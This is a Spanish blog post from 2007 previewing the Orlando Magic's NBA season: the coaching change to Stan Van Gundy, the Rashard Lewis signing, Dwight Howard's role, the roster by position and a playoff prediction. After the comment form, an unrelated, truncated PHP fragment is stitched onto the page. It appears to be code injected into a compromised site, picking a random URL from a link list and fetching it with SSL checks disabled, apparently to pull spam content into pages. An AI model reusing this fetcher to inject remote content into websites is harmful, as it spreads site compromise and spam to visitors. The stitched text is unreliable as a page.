Orlando Magic: un nuevo estilo

17 de October de 2007 por Noelinho

Van GundyLa temporada pasada volvió a ver a los Magic como equipo de Playoffs. Sin embargo, pese a acabar con un período de tres años sin lograr clasificarse para la post-season, en Orlando no quedaron contentos con el juego del equipo. Al entrenador, Brian Hill, se le acusó de hacer un juego ramplón, sin margen de maniobra ni lugar para la creatividad de los jugadores. Otis Smith, GM de la franquicia, debió de pensar lo mismo y cuando finalizó la pasada temporada despidió a Brian Hill y contrató a Billy Donovan, entrenador que ha ganado las últimas dos ediciones de la NCAA con Florida. Sin embargo éste apenas estuvo cinco días con los Magic ya que renunció al cargo por motivos personales. No obstante, Otis Smith tenía un plan B y a los pocos días contrató a Stan Van Gundy.

Pero el gran nombre del verano para Orlando ha sido el de Rashard Lewis. El hasta esta temporada alero de los Sonics era pretendido por más de media NBA y finalmente aceptó la jugosa oferta de los Magic, con lo que pasa a ser uno de los jugadores mejor pagados de toda la liga. No obstante, la piedra angular de este nuevo proyecto de los Magic no será Rashard sino Dwight Howard, que continuará siendo la figura del equipo. El joven pívot firmó la pasada campaña su mejor temporada en la liga promediando 17.6 puntos por partido, 12.3 rebotes y casi 2 tapones por partido. Parece que el futuro del equipo pasa por su figura, los técnicos de los Magic lo saben y, probablemente por eso, han contratado como técnico asistente a un Pat Ewing que puede hacerle crecer como jugador aún más.

A pesar de la presencia de Howard en el juego interior del equipo, parece que éste va a ser el talón de Aquiles de este conjunto ya que la lesión para toda la temporada de Tony Battie lo deja en cuadro. Adonal Foyle deja todaDwight Howard una vida en Oakland para emprender una nueva etapa en Orlando, donde tendrá a buen seguro unos minutos importantes de juego. Finalmente, los jóvenes James Augustine y el polaco Marcin Gortat completarán la corta rotación interior del equipo.

La clave para que los Magic funcionen será que sus actores secundarios rindan a su mejor nivel. Uno de éstos será Jameer Nelson, el base del equipo. De él se espera que vuelva a lo que apuntó hace un par de temporadas y deje atrás una decepcionante temporada como fue la anterior. Dos cosas apuntan a que ésta será una buena temporada para Jameer: la primera es que parece que se encuentra muy a gusto jugando de la manera que impone Van Gundy, y así lo manifestó al término de uno de los primeros partidos de pretemporada. La segunda razón es que, como todos sabemos, cuando un jugador está en su último año de contrato suele cuajar buenas temporadas para firmar por una cifra alta de cara a las siguientes. Keyon Dooling y Carlos Arroyo serán los otros directores de juego con los que contará Orlando.

Una de las posiciones que más ha dado que comentar en esta pretemporada de los Magic es la de escolta. Con la marcha de Grant Hill rumbo a Phoenix, JJ Redick y Keith Bogans serán los que se jueguen la plaza. Lo más probable es que se repartan los minutos de manera bastante equitativa. JJ Redick posee un potencial ofensivo enorme, un tiro mortífero, que puede ayudar muchísimo al equipo cuando las defensas se cierren sobre Howard. Si consigue recuperar la confianza y olvidar su temporada rookie, debería de ser el titular del equipo y una pieza importante. Bogans aportará más trabajo y sacrificio. Si el entrenador sabe compenetrar ambas piezas la posición de escolta quedará bien cubierta.

JJ RedickProbablemente la posición más fuerte sea la de alero. Rashard Lewis, Turkoglu y Trevor Ariza forman una tripleta de mucha calidad y trabajo. Lewis es una de las figuras de la liga, a la que no vamos a descubrir aquí. Entre él y Turkoglu compaginarán las posiciones de 3 y de 4. La baja de Battie obligará a ello, y probablemente Rashard habrá jugado al final de la temporada más minutos de 4 que de 3.

Pero ¿hasta dónde puede llegar este equipo? La respuesta es difícil. Todo dependerá de cómo se entiendan Lewis y Howard y, sobre todo, de que otros jugadores den un paso adelante y asuman nuevas responsabilidades. Es el caso de Nelson, Redick, Turkoglu… que son los que al final de la temporada decantarán la balanza. También hay que ver cómo se acostumbra el equipo al paso del estilo de juego de Brian Hill, lento y correoso, a lo que pretende Van Gundy, correr mucho y tirar aún más (parece que el famoso Run and Gun de los Suns está de moda). Ésas serán las claves del equipo: si se cumplen probablemente alcancen su objetivo, clasificarse para Playoffs; si no, la tarea será muy complicada.

Quinteto: Nelson, Redick, Turkoglu, Lewis y Howard
Sexto hombre: Ariza

Predicción: primera ronda de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>